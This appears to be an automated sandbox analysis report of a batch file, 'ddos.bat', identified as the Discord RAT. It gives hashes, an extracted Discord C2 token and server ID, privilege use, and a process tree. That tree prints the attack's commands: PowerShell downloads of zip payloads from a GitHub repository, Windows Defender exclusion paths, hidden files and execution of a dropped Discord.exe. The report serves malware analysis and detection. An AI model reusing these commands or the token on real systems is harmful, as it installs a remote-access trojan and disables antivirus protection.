Analysis
-
max time kernel
13s -
max time network
15s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
10-11-2024 15:18
Static task
static1
Behavioral task
behavioral1
Sample
ddos.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
ddos.bat
-
Size
1KB
-
MD5
15ee8aecfc89d8bed8f362cb46e4b8bb
-
SHA1
c39b884897d73006daa07d29264670d181835624
-
SHA256
7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082
-
SHA512
553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66
Malware Config
Extracted
discordrat
-
discord_token
MTI5Njg5NDEwMjY0NTkwMzQwMA.GffxcT.wWuk4gdi5T-RNzCLfFQ4XgAEMO4ZjpXcRu5E5Y
-
server_id
1293738586679672945
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 14 2816 powershell.exe 18 2816 powershell.exe 21 4908 powershell.exe 22 4908 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2816 powershell.exe 4908 powershell.exe 3872 powershell.exe 2728 powershell.exe 3312 powershell.exe 5080 powershell.exe 1908 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Discord.exepid process 692 Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 16 raw.githubusercontent.com 18 raw.githubusercontent.com 22 raw.githubusercontent.com -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3312 powershell.exe 3312 powershell.exe 2816 powershell.exe 2816 powershell.exe 5080 powershell.exe 5080 powershell.exe 3872 powershell.exe 3872 powershell.exe 2728 powershell.exe 2728 powershell.exe 1908 powershell.exe 1908 powershell.exe 4908 powershell.exe 4908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDiscord.exedescription pid process Token: SeDebugPrivilege 3312 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeIncreaseQuotaPrivilege 2728 powershell.exe Token: SeSecurityPrivilege 2728 powershell.exe Token: SeTakeOwnershipPrivilege 2728 powershell.exe Token: SeLoadDriverPrivilege 2728 powershell.exe Token: SeSystemProfilePrivilege 2728 powershell.exe Token: SeSystemtimePrivilege 2728 powershell.exe Token: SeProfSingleProcessPrivilege 2728 powershell.exe Token: SeIncBasePriorityPrivilege 2728 powershell.exe Token: SeCreatePagefilePrivilege 2728 powershell.exe Token: SeBackupPrivilege 2728 powershell.exe Token: SeRestorePrivilege 2728 powershell.exe Token: SeShutdownPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeSystemEnvironmentPrivilege 2728 powershell.exe Token: SeRemoteShutdownPrivilege 2728 powershell.exe Token: SeUndockPrivilege 2728 powershell.exe Token: SeManageVolumePrivilege 2728 powershell.exe Token: 33 2728 powershell.exe Token: 34 2728 powershell.exe Token: 35 2728 powershell.exe Token: 36 2728 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 692 Discord.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.execmd.execmd.exedescription pid process target process PID 4368 wrote to memory of 3312 4368 cmd.exe powershell.exe PID 4368 wrote to memory of 3312 4368 cmd.exe powershell.exe PID 4368 wrote to memory of 3176 4368 cmd.exe cacls.exe PID 4368 wrote to memory of 3176 4368 cmd.exe cacls.exe PID 4368 wrote to memory of 3516 4368 cmd.exe attrib.exe PID 4368 wrote to memory of 3516 4368 cmd.exe attrib.exe PID 4368 wrote to memory of 2816 4368 cmd.exe powershell.exe PID 4368 wrote to memory of 2816 4368 cmd.exe powershell.exe PID 4368 wrote to memory of 3476 4368 cmd.exe tar.exe PID 4368 wrote to memory of 3476 4368 cmd.exe tar.exe PID 4368 wrote to memory of 4780 4368 cmd.exe cmd.exe PID 4368 wrote to memory of 4780 4368 cmd.exe cmd.exe PID 4780 wrote to memory of 5080 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 5080 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 3872 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 3872 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 2728 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 2728 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 1132 4780 cmd.exe cmd.exe PID 4780 wrote to memory of 1132 4780 cmd.exe cmd.exe PID 1132 wrote to memory of 1908 1132 cmd.exe powershell.exe PID 1132 wrote to memory of 1908 1132 cmd.exe powershell.exe PID 1132 wrote to memory of 4908 1132 cmd.exe powershell.exe PID 1132 wrote to memory of 4908 1132 cmd.exe powershell.exe PID 1132 wrote to memory of 4796 1132 cmd.exe tar.exe PID 1132 wrote to memory of 4796 1132 cmd.exe tar.exe PID 1132 wrote to memory of 692 1132 cmd.exe Discord.exe PID 1132 wrote to memory of 692 1132 cmd.exe Discord.exe PID 1132 wrote to memory of 4788 1132 cmd.exe attrib.exe PID 1132 wrote to memory of 4788 1132 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 3516 attrib.exe 4788 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:3176
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\system32\tar.exetar -xf 1.zip2⤵PID:3476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\system32\tar.exetar -xf Discord.zip4⤵PID:4796
-
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d4⤵
- Views/modifies file attributes
PID:4788
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268B
MD5cdb8a5fcca6c6b2ac156c95610dd62b0
SHA1fc9143fbdfc511193d627682d03da517ef03eac0
SHA256c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df
SHA512b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9
-
Filesize
661B
MD515af212f6b388a57510af30146ea51f8
SHA19833f92d882d8e69bd453bdb2f3feda15d961c0f
SHA25662b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897
SHA51290614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05
-
Filesize
327B
MD59cbac74f137243a22af973eacd90de31
SHA13260ea401134322fe037a35b685c66a0793c3658
SHA256567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465
SHA512e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60
-
Filesize
51KB
MD585f1a70f2760fc2b1c9dd2e11d178548
SHA1c92415eb189ebb19efa29a1be6eeea7421d2eabc
SHA2569c3a2642864d1680716134111aa3ce37cf1f99829a4d8301b4972230358389ec
SHA512f5a8e36d502992f733dd5473d6146bd0a1b3f17a7377b62f2f628318cccf9cec236ea6bac268d9a4377ea12cd4d984f4b59553d4c5de2481bcb710f20d5a2aef
-
Filesize
45KB
MD56c33dba78cdd4a159b34c812616bfa6a
SHA18e486a8492e7b782762c08765572da921435a759
SHA2560c92eb7b8f6dcf63ee71137c8f3908382e4d4010e2d3a55b4b8036e86260f47a
SHA512afe6084e6f50fe26796083a293bd79a82c06d42880657c5e9055bb52677d43cbe12a63134c2dae0259c1f6f6f70bd6ea3237f3cd3665f6e0d3118ff70c225581
-
Filesize
2KB
MD5e30544e6d048b2c1c6129c89835c16dd
SHA121d167ff64825d3f8a5c351c3160b670dc14cb60
SHA256df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1
SHA512fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1KB
MD5f61ce4c559ee1efc9d4be59103b0aa9a
SHA1c8b0f76507b78641caec5ceb0fd2b1db4a6ae4f3
SHA256ae1e77d9d8d95487997bb790d1fe3e8f1a80939d8973518259258768d40ce6c4
SHA51241473cc6fd8e35dd0ad37a6564754147c908c32549b000ebeaf3cd4d1f4c3ed455d7b5d4f2e347810f944573b533e1a541a519ce78af82c5b028bbbfedc372b8
-
Filesize
64B
MD5edc94d6cffeec0aa87c5efc4d515f79a
SHA18ab843d139d849f5e72008e14013aa1008945e6d
SHA25647d73c514b6ba6bea241dac0491ce942cedb7a5fb9621dca3c95ce5511f272f2
SHA5120b9505035c2b8a9094647be0836afe701489d5b51ac758d13233c1e563809b219bb4443f2e527503af14573c32d733618dab1a35c8c7b789fbe4d52711572f11
-
Filesize
1KB
MD55e22dd1cda88782a1f52f76e748ef957
SHA13231826619a06fa541e2bfb21da445bd7013b5ac
SHA25673302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec
SHA51275039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498
-
Filesize
1KB
MD50737828899d8dc28b08229f519877f20
SHA167d2ba6983432edb1da3a0489ba0619b9116522f
SHA256afdaa764ca98f938d6cf13c03781bb9ceaf915a073e313ae7422c145e1d24f32
SHA512e8159a7474ca11951daaa647cdeb19113d3fe8defee631dec26079bd990b3f612d59cd9c6603e24487c104ced011680b65e0bf110bf2472071360453ba8caeaf
-
Filesize
64B
MD5aea9764134ee05e56110215dfca992cc
SHA1b9494ecdad42024221a23f235ff308fcd9f53863
SHA256c14a0a9a64c150d7b2e7e02e86ffc279ef6b09c9d04bdbf6b32219efdd0a4386
SHA5124e4a89b18496e4c0bfb42f29b66669a2ff18bcfd1f131df60f4e65bb6024c026bb121119804060b186150aed1b33a375ee332c0dd13630bdd7f32228ba29fc04
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82